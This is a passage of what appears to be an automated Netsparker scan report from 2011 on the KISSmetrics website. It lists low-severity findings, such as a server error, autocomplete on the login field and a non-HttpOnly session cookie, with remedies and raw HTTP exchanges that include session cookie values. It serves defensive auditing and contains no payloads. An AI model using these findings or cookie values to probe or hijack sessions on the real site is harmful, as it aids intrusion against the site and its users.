&ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." ..
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /signup

/signup CONFIRMED

https://www.kissmetrics.com/signup

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 41
Expect: 100-continue
Accept-Encoding: gzip, deflate

account[meta][company_size]=1+to+5+people

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:37:43 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Content-Length: 1152
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Server Error (500) - KISSmetrics</title> <meta charset="utf-8" /> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="stylesheet" href="/stylesheets/none.css" type="text/css" media="all" charset="utf-8" /> </head> <body> <div class="wrapper"> <div id="error_500"> <span class="ribbon"></span> <h2>Sorry, but there was an error. <strong>(500)</strong></h2> <hr /> <p>If you think this was an error on our part, please <a href="mailto:support@kissmetrics.com">let us know</a>. If not, maybe these links will help you:</p> <ul> <li><a href="/dashboard">Your Dashboard</a></li> <li><a href="/login">Sign-in</a></li> <li><a href="http://support.kissmetrics.com">KISSmetrics support site</a></li> <li><a href="/">KISSmetrics.com Homepage</a></li> </ul> </div> </div> <a href="//www.kissmetrics.com/" id="logo"><img src="/images/logo_sm.png" alt="KISSmetrics logo" title="KISSmetrics" height="22" width="160" /></a> </body></html>
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-DORK the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Field Name

login

Request

GET /privacy HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:15 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. (See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol ("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Cookie

sid

Request

HEAD /privacy HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Accept: netsparker/check
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:10 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
Connection: keep-alive


Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /stylesheets/external/

/stylesheets/external/ CONFIRMED

https://www.kissmetrics.com/stylesheets/external/

Request

GET /stylesheets/external/ HTTP/1.1
Referer: https://www.kissmetrics.com/stylesheets/external/shell.css?r=1669
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:24 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 123
Connection: keep-alive


<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /privacy

/privacy

https://www.kissmetrics.com/privacy

Found E-mails

  • privacy@kissmetrics.com
  • support@kissmetrics.com

Request

GET /privacy HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:11 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other 